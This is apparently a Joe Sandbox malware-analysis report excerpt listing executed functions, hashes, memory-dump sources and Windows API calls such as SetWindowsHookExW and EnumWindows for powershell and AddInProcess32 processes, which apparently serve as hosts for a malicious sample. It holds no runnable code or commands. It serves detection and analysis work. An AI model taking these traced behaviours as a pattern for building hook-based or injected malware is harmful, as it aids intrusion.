Opcode ID: 592ab6ce10182db71c17b70bd791e056c29048f77b96b815312cfd07ade49f8b
Instruction ID: af518d1e1bf75b941bc8f5fdcee5376da742ec37eb3b11444bcfa92ab6e1b922
Opcode Fuzzy Hash: 592ab6ce10182db71c17b70bd791e056c29048f77b96b815312cfd07ade49f8b
Instruction Fuzzy Hash: CA01D622F2E91D9FE3B8E79C74355B873C1EF84320B5501B6E41DC31E6ED15AC024281

Function 00007FFD9B893FD5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865297609.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: b9e3671ed999a91d774a9061481b6e8ebbaa6e1bcff7b2b2f92dfd77937eea8f
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 8D01A73020CB0C4FDB48EF0CE451AA5B7E0FB89320F10056DE58AC36A1D732E881CB41

Function 00007FFD9B8B4DD0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865297609.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adda3af07081630ea2ccdf3809180445c851b27ea77f179675e191271ee1fd76
Instruction ID: 116f43e8219830183587b435e8e1ed53d4cd744cf1da5cd75eb33b3bb1819d3f
Opcode Fuzzy Hash: adda3af07081630ea2ccdf3809180445c851b27ea77f179675e191271ee1fd76
Instruction Fuzzy Hash: F1E04610F0B93E06FAF462FA34661F821C4CF4C320F0A11B6E80DD21E6ED896EC20AC5

Non-executed Functions

Function 00007FFD9B8970FA Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865297609.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f605dcac55ecfc882b1e5efaef51b088b7da986e37506a4888f7847d9f4e8c35
Instruction ID: f23e811e3f1b3924ee8fe0b6e5beb3038bb2f6deb64bb910c913930e23cdf203
Opcode Fuzzy Hash: f605dcac55ecfc882b1e5efaef51b088b7da986e37506a4888f7847d9f4e8c35
Instruction Fuzzy Hash: 03020731B1DA5E4BE76CAB6894666B973C2FF88300F45417DE04EC72E3DD29B94286C1

Function 00007FFD9B897118 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865297609.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d05ec59d7200f0fb793d9d1cd228d9905ee02c058b6128069efebb740606c27b
Instruction ID: f3288cb7df0e98d0764f05c4fba70148fc097850a16fefeaba45568dbeaebe0f
Opcode Fuzzy Hash: d05ec59d7200f0fb793d9d1cd228d9905ee02c058b6128069efebb740606c27b
Instruction Fuzzy Hash: 15F11571B1CE4D4FE7ACAB6C94666B473C2EB98710F40417EE44EC32E7DE25B9428681

Analysis Process: AddInProcess32.exePID: 7564, Parent PID: 7500COMMON

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	7

Executed Functions

Function 05C70048 Relevance: 26.7, Strings: 21, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05C7016D
$^q, xrefs: 05C703C2
$^q, xrefs: 05C70281
$^q, xrefs: 05C70275
$^q, xrefs: 05C7024F
$^q, xrefs: 05C704F5
$^q, xrefs: 05C7051B
$^q, xrefs: 05C704A4
$^q, xrefs: 05C70439
$^q, xrefs: 05C70331
$^q, xrefs: 05C70363
$^q, xrefs: 05C702E0
$^q, xrefs: 05C70445
$^q, xrefs: 05C701FE
$^q, xrefs: 05C70413
$^q, xrefs: 05C70357
$^q, xrefs: 05C70193
?, xrefs: 05C700AF
$^q, xrefs: 05C7019F
$^q, xrefs: 05C70527
$^q, xrefs: 05C7011C

Memory Dump Source

Source File: 00000006.00000002.4235685529.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c70000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ?$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2982888449
Opcode ID: 5993565a9923123118850c71de9024b4c305b95582348ed774271983e9749bc8
Instruction ID: a31c388843b71f506d64e05f7595e6fae1d265037b5dbc4f489a144a303fb90d
Opcode Fuzzy Hash: 5993565a9923123118850c71de9024b4c305b95582348ed774271983e9749bc8
Instruction Fuzzy Hash: 47F19234B0060C8FDB25DB65C948A6EBBB3FF84704F108869E406AB7A5CB75DD46CB91

Function 05C71420 Relevance: 12.9, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05C716CD
$^q, xrefs: 05C7174E
$^q, xrefs: 05C718BB
$^q, xrefs: 05C71742
JCvq, xrefs: 05C7144D
$^q, xrefs: 05C7171C
$^q, xrefs: 05C71895
$^q, xrefs: 05C718C7
$^q, xrefs: 05C71846
JCvq, xrefs: 05C71556

Memory Dump Source

Source File: 00000006.00000002.4235685529.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c70000_AddInProcess32.jbxd

Similarity

API ID:
String ID: JCvq$JCvq$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1450370932
Opcode ID: 2e8ff59f279b449393a050a551705637c6f74e20e11d4eec766bfff3ea2dddba
Instruction ID: 37c2ba2a2ee74af5beefc5226be45a360d7f7ea4a7e2c94e9ca25a19c15172e2
Opcode Fuzzy Hash: 2e8ff59f279b449393a050a551705637c6f74e20e11d4eec766bfff3ea2dddba
Instruction Fuzzy Hash: FFF18E34B006098FCB14DFA9C9549BEBBF7FF88214B18886AD9069B7A5CB34DD45CB50

Function 05C71200 Relevance: 10.2, Strings: 8, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05C71327
$^q, xrefs: 05C71333
;^q, xrefs: 05C7121B
JCvq, xrefs: 05C71399
$^q, xrefs: 05C712B2
$^q, xrefs: 05C71301
JCvq, xrefs: 05C71370
;^q, xrefs: 05C71227

Memory Dump Source

Source File: 00000006.00000002.4235685529.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c70000_AddInProcess32.jbxd

Similarity

API ID:
String ID: JCvq$JCvq$$^q$$^q$$^q$$^q$;^q$;^q
API String ID: 0-4185821237
Opcode ID: ec7b6799c11e133946a720d7e4bb47afb1079a2b1e50f0e87ee1ad753d79374e
Instruction ID: d3da206daa2e3162b097ae3f7a4d4d2227db37876624f9a45ff160b52d870de0
Opcode Fuzzy Hash: ec7b6799c11e133946a720d7e4bb47afb1079a2b1e50f0e87ee1ad753d79374e
Instruction Fuzzy Hash: B0515030B041099FCB189FAAC944ABEBBF7FF88300F148869D5069B765DB71D946CB91

Function 05C70035 Relevance: 7.7, Strings: 6, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05C702E0
$^q, xrefs: 05C703C2
$^q, xrefs: 05C701FE
?, xrefs: 05C700AF
$^q, xrefs: 05C704A4
$^q, xrefs: 05C7011C

Memory Dump Source

Source File: 00000006.00000002.4235685529.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c70000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ?$$^q$$^q$$^q$$^q$$^q
API String ID: 0-4250046088
Opcode ID: 4906730eff51c61eec7677adb5b8900fde014112912f5350c6c4402a79c80230
Instruction ID: d63adf42e0da6fe690533fe71c467a6b50f19f3df5f78d11b780303457cba017
Opcode Fuzzy Hash: 4906730eff51c61eec7677adb5b8900fde014112912f5350c6c4402a79c80230
Instruction Fuzzy Hash: 1C810534B406098FDB15CB69C854BAEBBA7FF84300F104925D501EB7A5DEB9DD06CB91

Function 00CBCD88 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CBCE16
GetCurrentThread.KERNEL32 ref: 00CBCE53
GetCurrentProcess.KERNEL32 ref: 00CBCE90
GetCurrentThreadId.KERNEL32 ref: 00CBCEE9

Memory Dump Source

Source File: 00000006.00000002.4208639564.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: eadd93d74ff0b116be729bbe1e94a86e5bbddd7c225b8d00dec21f7fbe4e29f7
Instruction ID: b2804488403db380302a816cdea117a7fcf0a6e13d94f52a89d749be81ab53a7
Opcode Fuzzy Hash: eadd93d74ff0b116be729bbe1e94a86e5bbddd7c225b8d00dec21f7fbe4e29f7
Instruction Fuzzy Hash: 2E5165B4D01649CFDB04DFA9C588BDEBBF1AF88304F20846AE059A7360D774A984CF65

Function 00CBCD98 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CBCE16
GetCurrentThread.KERNEL32 ref: 00CBCE53
GetCurrentProcess.KERNEL32 ref: 00CBCE90
GetCurrentThreadId.KERNEL32 ref: 00CBCEE9

Memory Dump Source

Source File: 00000006.00000002.4208639564.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 840d553e3d3b1d66326f1d7280ea6a09cc1fdad2164b4c85f69d8ca2430efc5f
Instruction ID: 198b579ae8ea74ecb45be21faf373c50919dce36f01af4a4aa40d1062d7a7731
Opcode Fuzzy Hash: 840d553e3d3b1d66326f1d7280ea6a09cc1fdad2164b4c85f69d8ca2430efc5f
Instruction Fuzzy Hash: 335156B4D01649CFDB04DFA9D588BDEBBF1AF88304F20845AE059A7360D774A984CF65

Function 05C711ED Relevance: 5.1, Strings: 4, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05C712B2
;^q, xrefs: 05C7121B
JCvq, xrefs: 05C71399
JCvq, xrefs: 05C71370

Memory Dump Source

Source File: 00000006.00000002.4235685529.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c70000_AddInProcess32.jbxd

Similarity

API ID:
String ID: JCvq$JCvq$$^q$;^q
API String ID: 0-2663190820
Opcode ID: cd2781a59f46407a86151e9498951a859e493fcd38c3e8107010ab597f66d420
Instruction ID: c4d98d8e38f9f65e78163b95a1bb6709f881893802d0e9c6198a3ee1ef011292
Opcode Fuzzy Hash: cd2781a59f46407a86151e9498951a859e493fcd38c3e8107010ab597f66d420
Instruction Fuzzy Hash: D841C570B041499FCB198FAAC844ABEBBF7BF89300F188869D405DB765DB74C946CB91

Function 05DE7778 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?,?,?,?,00000000,00000000,?,05DE7B4D,00000000,00000000), ref: 05DE7C60

Memory Dump Source

Source File: 00000006.00000002.4235750841.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5de0000_AddInProcess32.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 7e2a260980db8c506e20dd5e921d3cafbd36400967090076bb0d4d9e732d929e
Instruction ID: 7cc5ee372256d15e76b8a18f8d15dec954c3c0f174d12c9416646643f4df0a21
Opcode Fuzzy Hash: 7e2a260980db8c506e20dd5e921d3cafbd36400967090076bb0d4d9e732d929e
Instruction Fuzzy Hash: F941EE718042A88FDB01EFACC9947DEBFF0FF49314F14406AD089AB261D7749485CBA9

Function 00CB1F0C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00CB33F1

Memory Dump Source

Source File: 00000006.00000002.4208639564.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4f9ce7bcaadd002ffc49a68c037b84e7520df474184a2c4c85d01c657633b22a
Instruction ID: 92d07a2ba6458740e44b367f511d841c89876f04005fb5c7f798cc3cd47320f5
Opcode Fuzzy Hash: 4f9ce7bcaadd002ffc49a68c037b84e7520df474184a2c4c85d01c657633b22a
Instruction Fuzzy Hash: 0E41F1B0C0465DCBDB24CFA9C844BDEBBF5BF48304F20806AD408AB251DBB56A45CF90

Function 00CB3337 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00CB33F1

Memory Dump Source

Source File: 00000006.00000002.4208639564.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ca21346ad28c853de2fe44136d9144675b2759b1f2a7407756df6742445b9c14
Instruction ID: 245dc8a0d7544eca18916646765cfa51b6dfb3e8a0a46cd363582fe793d53691
Opcode Fuzzy Hash: ca21346ad28c853de2fe44136d9144675b2759b1f2a7407756df6742445b9c14
Instruction Fuzzy Hash: 7641F0B0C00659CFDB25CFA9C844BDEBBF5BF49304F2480AAD408AB251DB756A46CF90

Function 05DE7BC8 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?,?,?,?,00000000,00000000,?,05DE7B4D,00000000,00000000), ref: 05DE7C60

Memory Dump Source

Source File: 00000006.00000002.4235750841.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5de0000_AddInProcess32.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 3cb8aec5d97110390081642416ba28c276579698b93ae98c00dbcc970f1afb1e
Instruction ID: 9a74efbe1e57894a3e166fc2cba827d5ac9afdbcc49e66b198f2017024896f47
Opcode Fuzzy Hash: 3cb8aec5d97110390081642416ba28c276579698b93ae98c00dbcc970f1afb1e
Instruction Fuzzy Hash: B63145B5900259CFCB05EFA8D984BDEBBF4FF48310F14881AD459B7261D7749944CBA4

Function 05DE776C Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?,?,?,?,00000000,00000000,?,05DE7B4D,00000000,00000000), ref: 05DE7C60

Memory Dump Source

Source File: 00000006.00000002.4235750841.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5de0000_AddInProcess32.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 32a12de9047c09a25438b7a05e9951581f8063d3b0e1ff22bc2ac472a260121b
Instruction ID: ae973b7216ac2fe4e0003e64eafd95c2b80b041360f911791f3af8b64c932e40
Opcode Fuzzy Hash: 32a12de9047c09a25438b7a05e9951581f8063d3b0e1ff22bc2ac472a260121b
Instruction Fuzzy Hash: EB2133B5D002188FCB10DFA9C988BDEBBF4FB48310F10882AE419B7360D774A940CBA5

Function 00CBCFD9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CBD067

Memory Dump Source

Source File: 00000006.00000002.4208639564.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 99a94dd1f85fd43c395fa5b79a95471ab486ca5fb378ddae1b4a734c90be223b
Instruction ID: 2d9069efab3fc141278682a09159702f924ed8d73058c07382e765b1024a340c
Opcode Fuzzy Hash: 99a94dd1f85fd43c395fa5b79a95471ab486ca5fb378ddae1b4a734c90be223b
Instruction Fuzzy Hash: 9021E2B5D00219DFDB10CFA9D984AEEBBF4EB08310F14841AE959B7361D374A945CFA4

Function 05DE7944 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000,00000000,?,?,?,?,?,?,?,05DE9664), ref: 05DE96FD

Memory Dump Source

Source File: 00000006.00000002.4235750841.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5de0000_AddInProcess32.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: d6a73f532efab8d2195070df4c01628e5b9ac47cec64603b093e9ebaa46cf0bc
Instruction ID: a5aca3d435a935318a58e18a3d0e5b20e0d8d6432e220a85ec406ce9914346f5
Opcode Fuzzy Hash: d6a73f532efab8d2195070df4c01628e5b9ac47cec64603b093e9ebaa46cf0bc
Instruction Fuzzy Hash: 3C2138B1D042498FCB14DF9AC844BEEBBF5EB88320F14842ED459A7390DB74A945CFA5

Function 00CBCFE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CBD067

Memory Dump Source

Source File: 00000006.00000002.4208639564.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 896752f75c038466cbc629e4e9ab5d11ea11fd5de74881a788972fab48063442
Instruction ID: 5e99dd22f483e35e2cd40c3559d7e34b8b430b3c6addaf973d6a6bcfd6807498
Opcode Fuzzy Hash: 896752f75c038466cbc629e4e9ab5d11ea11fd5de74881a788972fab48063442
Instruction Fuzzy Hash: BC21E2B5900248DFDB10CFAAD984ADEBFF8EB48320F14801AE918A7350D374A940CFA4

Function 05DE9680 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000,00000000,?,?,?,?,?,?,?,05DE9664), ref: 05DE96FD

Memory Dump Source

Source File: 00000006.00000002.4235750841.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5de0000_AddInProcess32.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 4bf55c171dd0702529de264e16b570ecabd091383f8aa191699ed952a27f9832
Instruction ID: cf92d9e64428dfeaa4b48ae9eb88e6c2cf3c8d76ff6d36efa6f6c266ca54c38b
Opcode Fuzzy Hash: 4bf55c171dd0702529de264e16b570ecabd091383f8aa191699ed952a27f9832
Instruction Fuzzy Hash: 1A2139719042498FCB14DF9AC8447DEBBF5AB88310F14842ED459A7390DB749945CF65

Function 05C71401 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

JCvq, xrefs: 05C7144D

Memory Dump Source

Source File: 00000006.00000002.4235685529.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c70000_AddInProcess32.jbxd

Similarity

API ID:
String ID: JCvq
API String ID: 0-4183214854
Opcode ID: f42c77e16d6cdf560ea4496c4ee1a5c8590921b2e9792a64f5d647032b720a62
Instruction ID: fff608930a6450b3a4248e23d7c7a7f73ce9804b878c7eaae6a4d0f40cf583bd
Opcode Fuzzy Hash: f42c77e16d6cdf560ea4496c4ee1a5c8590921b2e9792a64f5d647032b720a62
Instruction Fuzzy Hash: 6E31E434B042499FCB00DFB9C8509AEBBF6FF89214B14446AD911DB3A5DB348C06CB90

Function 05C70F90 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4235685529.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c70000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c543a2e320fdd7de8911710f70cfbb09eedaf6d96185af71c8505f24ae33e45
Instruction ID: fb7b5182e68bc9ed9fa51a2009a693fbda7d067c5c8d997f3ef5d708b75b1ba5
Opcode Fuzzy Hash: 1c543a2e320fdd7de8911710f70cfbb09eedaf6d96185af71c8505f24ae33e45
Instruction Fuzzy Hash: 0B714E34B002499FCB18DF69C8949AEBBF6FF85314F148869E9169B7A1CB31DD41CB90

Function 05C70F7F Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4235685529.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c70000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c6c2812dbb18984130f914920f483a976fb7b8de501478d986636008157d1a
Instruction ID: 1625ac7b755fffd64f5c2d2921f0b01afd34a3899c7c8698c2d75950647d6545
Opcode Fuzzy Hash: d0c6c2812dbb18984130f914920f483a976fb7b8de501478d986636008157d1a
Instruction Fuzzy Hash: F231AE34700249DFCB08DF69C9809AEBBB6FF89314B15856AE9159B7A1CB31DD41CB90

Function 00C5D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4207790651.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c5d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f55c9aed6d57d4ae62fd2463d7357a92d70e839fdfe819d501a3bd5998c7950
Instruction ID: f7fffc729371d32ff243c0ca19217f27651291362dacedfe92fdbf5f62fc873c
Opcode Fuzzy Hash: 7f55c9aed6d57d4ae62fd2463d7357a92d70e839fdfe819d501a3bd5998c7950
Instruction Fuzzy Hash: C22148B5500300DFCB15DF04C9C0B16BF65FB98319F208169EC0B0B256D336D98AC7A2

Function 00C6D110 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4207933365.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c6d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748902daf1d90b0038af8c943d39b039820c5c9af64d3d5ada2c573c631685ba
Instruction ID: a06064a066fea9cceff6002c7b2114b38348689743ab7b053518668853d253c6
Opcode Fuzzy Hash: 748902daf1d90b0038af8c943d39b039820c5c9af64d3d5ada2c573c631685ba
Instruction Fuzzy Hash: 59210475B04204DFCB24DF14D9C0B2ABBA5FB85324F20C56DE80A4B256C3BAD846CA61

Function 00C6D2D8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4207933365.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c6d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd6d74a4f3bd1e5044de16b2baad70179dba73072f6cb11b05828915c20ddd4
Instruction ID: 48fa2694f3715767a4a9639b8648b10389afbd46c9bd7cc62a4f921d3a3f8f62
Opcode Fuzzy Hash: 3bd6d74a4f3bd1e5044de16b2baad70179dba73072f6cb11b05828915c20ddd4
Instruction Fuzzy Hash: 0C2105B1B04240DFD720DF14D6C0B2ABBB5FB94714F20C579D84A4B351C339D80AC6A2

Function 00C5D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4207790651.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c5d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 83224630585e26e3ceba827705935881c00938d8cf98a8f32b85720f7f1602e2
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: CA119DB6504340CFDB16CF14D5C4B16BF61FB94319F2486A9DD0A0A256C33AD99ACBA1

Function 00C6D10B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4207933365.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c6d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: d5fc44d96810badf2cedc909bcb62c251a612ed96b9fac7653bd5e931a291c7b
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 7E11BE75A04240CFCB15CF10D9C4B19BBA1FB85324F24C6AADC4A4B256C37AD94ACB51

Function 00C6D2D3 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4207933365.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c6d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
Instruction ID: cca2526d5fb8a5f4433eac6153c5c2b81807e649b2f6ea36bad87533afc6c5d4
Opcode Fuzzy Hash: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
Instruction Fuzzy Hash: 1311A375A04680CFDB11CF14D5C4B19FBB1FB94714F24C6AAD84A4B756C33AD90ACB52

Analysis Process: AddInProcess32.exePID: 7576, Parent PID: 7500COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	45
Total number of Limit Nodes:	7

Executed Functions

Function 01797AA8 Relevance: 6.1, APIs: 4, Instructions: 147
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 01797B4E
GetCurrentThread.KERNEL32 ref: 01797B8B
GetCurrentProcess.KERNEL32 ref: 01797BC8
GetCurrentThreadId.KERNEL32 ref: 01797C21

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6309b23bddf6dfd7fedebd964cc0c259c353547f218ab46ac2be6b9bbbfd5c38
Instruction ID: 80049e2742d41b71aa3fc95fe99f7f88792063ac67c7b7a06fc2750492eaab4c
Opcode Fuzzy Hash: 6309b23bddf6dfd7fedebd964cc0c259c353547f218ab46ac2be6b9bbbfd5c38
